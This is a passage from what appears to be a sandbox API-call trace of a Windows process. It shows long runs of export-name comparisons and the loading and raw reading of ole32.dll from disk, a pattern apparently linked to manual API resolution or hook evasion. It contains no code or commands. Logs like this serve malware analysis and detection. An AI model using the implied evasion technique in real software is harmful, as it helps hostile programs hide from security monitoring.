(lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0156.191] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0156.192] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0156.192] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0156.192] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0156.192] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0156.192] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0156.192] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0156.192] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0156.192] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0156.192] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0156.192] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0156.192] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0156.192] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0156.192] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0156.192] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0156.192] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0156.192] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0156.192] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0156.192] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0156.192] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0156.192] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0156.192] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0156.192] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0156.192] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0156.192] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0156.192] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0156.192] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0156.192] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0156.192] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0156.192] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0156.192] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0156.192] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0156.193] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0156.193] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0156.193] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0156.194] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0156.195] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0156.195] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0156.196] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0156.196] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0156.196] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0156.196] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0156.196] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0156.196] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0156.393] GetProcessHeap () returned 0x450000 [0156.393] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2d42010 | out: hHeap=0x450000) returned 1 [0156.400] GetProcessHeap () returned 0x450000 [0156.400] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4693a0 [0156.400] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0156.401] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0156.401] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0156.401] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0156.401] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0156.401] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0156.401] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0156.401] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0156.401] GetProcessHeap () returned 0x450000 [0156.401] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x142d00) returned 0x4101040 [0156.404] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0156.404] ReadFile (in: hFile=0x140, lpBuffer=0x4101040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4101040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0156.522] CloseHandle (hObject=0x140) returned 1 [0156.522] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0156.522] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0156.522] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0156.522] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0156.522] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0156.522] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0156.522] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0156.522] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0156.522] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0156.522] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0156.523] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", 